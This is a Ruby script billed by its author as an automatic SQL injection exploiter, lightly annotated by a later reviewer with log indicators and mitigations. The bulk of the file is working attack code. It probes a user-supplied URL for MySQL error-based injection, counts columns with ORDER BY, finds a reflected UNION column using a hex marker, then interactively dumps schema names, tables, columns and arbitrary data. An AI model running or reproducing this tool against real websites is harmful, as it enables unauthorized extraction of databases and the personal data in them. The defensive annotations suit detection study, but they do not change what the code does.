SQL Injection auto exploit
By sQuo
#!/user/bin/ruby
require'open-uri'
=begin
Auto Sql Injection Exploiter By Hamza Killer xD :D
To Sec4ever && s3ck.net
TO : Uzun-Dz , R0x , Black-id xD
This tools is public_version inject union based (intiger and string)
the priv8 tools inject blind sql && union based && error based xD soon it will be public xD
my eng khkhkhk
=end

# Reviewer notes (defensive reading of this listing)
#
# What the script does, as visible below: it reads one URL from stdin, appends a
# single quote to it and looks for MySQL/PHP error text in the response, counts
# columns with ORDER BY 1..50, places a marker value in a UNION SELECT to find a
# column that is echoed back, then reads information_schema and finally a
# user-chosen column from a user-chosen table. Every request goes through
# get_con, i.e. an open-uri fetch with the injected text in the URL itself, so
# the whole sequence is visible in web-server access logs.
#
# Indicators a defender can search for in access logs / WAF telemetry, all taken
# from string literals in this file:
#   - the hex literal 0x68616d7a6178647a (decodes to "hamzaxdz", the marker the
#     script greps for in responses)
#   - MySQL version-conditional comments wrapped around keywords:
#     /*!12345UNION*/, /*!12345SELECT*/, /*!12345GrouP_CoNcaT(...)*/
#   - "+Order+by+N--+-" with N counting up from 1 on the same URL
#   - mixed-case references to information_schema (schemata, tables, columns)
#   - a "-" inserted directly after the first "=" of the URL
# Matching should be case-insensitive and done after URL-decoding and comment
# normalisation, because the keywords are case-mixed and wrapped in /*!...*/.
#
# Mitigations that remove the root cause rather than the signature:
# parameterised queries / prepared statements, strict typing of numeric
# parameters, no database error text in HTTP responses, and a least-privilege
# database account for the web application.

# Console colouring helpers: each method wraps the string in an ANSI escape
# sequence. This reopens the core String class for the whole process.
class String
  def red; "\033[31m#{self}\033[0m" end
  def green; "\033[32m#{self}\033[0m" end
  def brown; "\033[33m#{self}\033[0m" end
  def gray; "\033[37m#{self}\033[0m" end
  def bg_black; "\033[40m#{self}\0330m" end
  def bg_red; "\033[41m#{self}\033[0m" end
  def bg_green; "\033[42m#{self}\033[0m" end
  def bg_brown; "\033[43m#{self}\033[0m" end
  def bg_blue; "\033[44m#{self}\033[0m" end
  def bg_magenta; "\033[45m#{self}\033[0m" end
  def bg_cyan; "\033[46m#{self}\033[0m" end
  def bg_gray; "\033[47m#{self}\033[0m" end
end

# Prints the banner line by line in red, pausing 0.1 s between lines.
def home()
  text=[
    "[*]=========================================[*]",
    "[*] Auto Sql Injection Exploit V 1.0[*]",
    "[*] H A M Z A K I L L E R[*]",
    "[*] Hlyzidi[at]gmail[dot]com[*]",
    "[*]=========================================[*]"
  ]
  for oo in text
    puts oo.red
    sleep(0.1)
  end
end

# Fetches `url` through open (open-uri is required at the top of the file) and
# returns the whole response body as one string. All network traffic of the
# script passes through this function.
def get_con(url)
  f = open(url)
  x=f.readlines.join
  return x
end

# Normalises the user-supplied target: an http:// string becomes a URI, an
# https:// string prints a message and exits, anything else gets "http://"
# prepended before being turned into a URI.
def url_x(url)
  if(url =~ /http:\/\//)
    url=URI(url)
  elsif (url =~ /https:\/\//)
    puts "Tool NOt work with ssl sorry "
    exit
  else
    url=URI("http://#{url}")
  end
end

# Fetches `url` and returns true when the body contains one of several
# MySQL/PHP error strings; otherwise falls through and returns nil.
# Defender note: the check depends entirely on database error text reaching the
# HTTP response, which is why error display should be off in production and
# errors logged server-side only.
def infected_1(url)
  x=get_con(url)
  if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i)
    return true
  end
end

# Substitutes the column placeholder `clm` inside `pay` with a GROUP_CONCAT of
# schema_name wrapped in the marker, appends a FROM information_schema.schemata
# clause to `url`, fetches it and prints each unique value found between two
# "hamzaxdz" markers. `xssp` is assigned but not used.
# Defender note: what information_schema returns is limited by the privileges
# of the account the application connects with.
def get_all_data(url,clm,pay)
  xssp="#{url}#{pay}"
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,SchEmA_NamE,0x68616d7a6178647a)*/"
  begin
    xuxrl=pay.sub("#{clm}","#{payload}")
    xurl=URI("#{url}#{xuxrl}+FroM+iNForMaTion_SchEmA.SchEmAta--+-")
  rescue
    print "some thing Wrong"
  end
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  for dat in data.uniq
    puts "|| [+] #{dat[0]}"
  end
end

# Builds a URL string with a UNION SELECT suffix from `ur`.
# NOTE(review): no call to this function appears in the visible script.
def url_pasq(ur,col)
  p=ur.sub("=","=-");
  po="+/*!12345UNION*/+/*!12345SELECT*/+1";
  while (i=2 < col)
    i=2+1
    pppp="#{p}#{po}+,#{i}--+-"
    return pppp
  end
end

# Requests database(), version() and user() in one GROUP_CONCAT, separated by
# 0x2f3a3a2f ("/::/") and wrapped in the marker, then splits the first match on
# "/::/" and prints the three values. Any exception raised in the method body
# is caught by the method-level rescue, which prints "Error !!!!!".
def get_data(url,clm,pay)
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,database(),0x2f3a3a2f,version(),0x2f3a3a2f,user(),0x68616d7a6178647a)*/"
  xuxrl=pay.sub("#{clm}","#{payload}")
  xurl=URI("#{url}#{xuxrl}")
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  begin
    for dat in data[0]
      xd=dat.split("/::/")
      database=xd[0]
      version=xd[1]
      user=xd[2]
      puts "[+] Db server user :#{user} ".green
      puts "[+] Database version : #{version} ".green
      puts "[+] current Database : #{database}".green
    end
  end
rescue
  puts "Error !!!!!"
end

# Has the database server hex-encode `xstring` (HEX() inside the injected
# GROUP_CONCAT, with %27 as the URL-encoded quote) and returns the first value
# captured between the markers. The script later places that value in
# WHERE clauses where a quoted name would otherwise be needed.
# Defender note: the absence of quote characters in a request is therefore not
# evidence that it is benign.
def hex_string(url,clm,pay,xstring)
  xssp="#{url}#{pay}"
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,%270x%27,HEX(%27#{xstring}%27),0x68616d7a6178647a)*/"
  xuxrl=pay.sub("#{clm}","#{payload}")
  xurl=URI("#{url}#{xuxrl}+--")
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  for dat in data.uniq
    return dat[0]
  end
end

# Prints every unique table_name that information_schema.tables returns for
# the schema given in `db` (passed in the form produced by hex_string).
def get_all_tables(url,clm,pay,db)
  xssp="#{url}#{pay}"
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,table_name,0x68616d7a6178647a)*/"
  xuxrl=pay.sub("#{clm}","#{payload}")
  xurl=URI("#{url}#{xuxrl}+from+information_schema.tables+where+table_schema=#{db}--+-")
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  for dats in data.uniq
    for dat in dats
      puts "|| [+] #{dat}".brown
    end
  end
end

# Prints every unique column_name that information_schema.columns returns for
# the given schema (`db`) and table (`table`).
def get_all_clum(url,clm,pay,db,table)
  xssp="#{url}#{pay}"
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,column_name,0x68616d7a6178647a)*/"
  xuxrl=pay.sub("#{clm}","#{payload}")
  xurl=URI("#{url}#{xuxrl}+FROM+INFORMATION_ScheMa./*!columNs*/+WhErE+tablE_scheMa=#{db}+and+table_name=#{table}--+-")
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  for dat in data.uniq
    puts "[+] #{dat[0]}".green
  end
end

# Prints the unique values of column expression `colm` read from `db`.`table`.
# `colm`, `db` and `table` are interpolated into the URL exactly as typed by
# the operator.
def get_all_data_bitch(url,clm,pay,db,table,colm)
  xssp="#{url}#{pay}"
  payload="/*!12345GrouP_CoNcaT(0x68616d7a6178647a,#{colm},0x68616d7a6178647a)*/"
  xuxrl=pay.sub("#{clm}","#{payload}")
  xurl=URI("#{url}#{xuxrl}+FroM+#{db}.#{table}--+-")
  xd=get_con(xurl)
  data=xd.scan(/hamzaxdz(.*?)hamzaxdz/i)
  for dat in data.uniq
    puts "[+] #{dat[0]}"
  end
end

# ---- Main script: error-based check --------------------------------------
# Reads the target from stdin, normalises it and requests it once with a
# trailing single quote; `x` is true when error text came back.
home()
print("# Eenter Url ->")
begin
  urld=gets.chomp
  if !(urld)
    print "# Error !!!!!!!!!"
    exit
  end
  url=url_x(urld)
  x=infected_1("#{url}'")
rescue
  print "# Error !!!!!!!!!\n"
  exit
end
if(x)
  print"[+] #{url} => SQl Injection Found\n".bg_blue
  print"[+] injection type is Integer\n".bg_blue
else
  puts"[-] Not Vul ".bg_cyan
  puts"[*] Or injection type is string".bg_cyan
end

# ---- Column count ---------------------------------------------------------
# Requests "+Order+by+i--+-" for i = 1..50 and stops at the first response that
# contains error text; the column count is taken as i-1.
# Defender note: this is a burst of up to 50 near-identical requests from one
# client that differ only in the trailing integer.
for i in 1..50
  urls=URI("#{url}+Order+by+#{i}--+-")
  x=get_con(urls)
  if (x=~ /Unknown column/i || x=~ /on line/i || x=~ /Warning MySQL/i|| x=~ /You have an error in your SQL syntax/i|| x=~/Warning MySQL/i || x=~/Warning: mysql_num_rows():/i|| x=~/in 'order clause'/i)
    clnb=i-1;
    break
    sleep(0.2)
  end
end

print"[+] columns number : #{clnb}\n".bg_blue

# ---- Reflected column -----------------------------------------------------
# Builds the UNION SELECT prefix from the raw input string `urld` (a "-" is
# inserted after the first "="), then replaces one column position at a time
# with the marker literal until the marker text shows up in the response.
print"[+] Searching for infected columns ...........\n".bg_red
p=urld.sub("=","=-");
po="+/*!12345UNION*/+/*!12345SELECT*/+";
all_url="#{p}#{po}"
dz=[]
begin
  for i in (2..clnb).to_a
    dz.push(i)
    sleep(0.00003)
  end
rescue
  print "Error xD :D !!!!!".bg_red
  exit
end
clm_num=dz.join(",")
clm_num="1,#{clm_num}"
x_clminf="#{all_url}#{clm_num}--"
for ix in (1..clnb)
  xpx=clm_num.sub("#{ix}",'0x68616d7a6178647a');
  ppps=URI("#{all_url}#{xpx}--")
  x_url=get_con(ppps)
  if(x_url =~ /hamzaxdz/i)
    p_ss=ix
    break
  end
  sleep(0.00003)
end
puts "[+] Found infected columns is : #{p_ss}".bg_brown

# Server user, version and current database.
get_data(all_url,p_ss,clm_num)

# ---- Interactive enumeration: schemas -> tables -> columns -> data --------
into=["||==================================================||",
      "||=========== databases ===========||",
      "||==================================================||"]
xbar=["||==================================================||"]
for ine in into
  puts ine
  sleep(0.2)
end
get_all_data(all_url,p_ss,clm_num)
for ine in xbar
  puts ine
  sleep(1)
end
print('# PLZ chois Database :')
data_user=gets.chomp
# Hex-encoded form of the chosen database name, used in the WHERE clauses.
database_hex=hex_string(all_url,p_ss,clm_num,data_user)

# Tables of the chosen database.
into=["||==================================================||",
      "||=========== Tables ===========||",
      "||==================================================||"]
for ine in into
  puts ine
  sleep(0.2)
end
get_all_tables(all_url,p_ss,clm_num,database_hex)
for ine in xbar
  puts ine
  sleep(1)
end
print('# PLZ Enter Table :')
tab_user=gets.chomp
table_hex=hex_string(all_url,p_ss,clm_num,tab_user) # hex-encoded table name

# Columns of the chosen table.
into=["||==================================================||",
      "||=========== columns ===========||",
      "||==================================================||"]
for ine in into
  puts ine
  sleep(0.2)
end
get_all_clum(all_url,p_ss,clm_num,database_hex,table_hex)
for ine in xbar
  puts ine
  sleep(1)
end

# Endless prompt loop: `a` is never set to false, so the script keeps reading
# column expressions and printing their values until the process is stopped.
a=true
while a
  print "# Enter columns ->"
  clm=gets.chomp
  begin
    get_all_data_bitch(all_url,p_ss,clm_num,data_user,tab_user,clm)
  rescue
    print "Error !!!!!!\n"
  end
end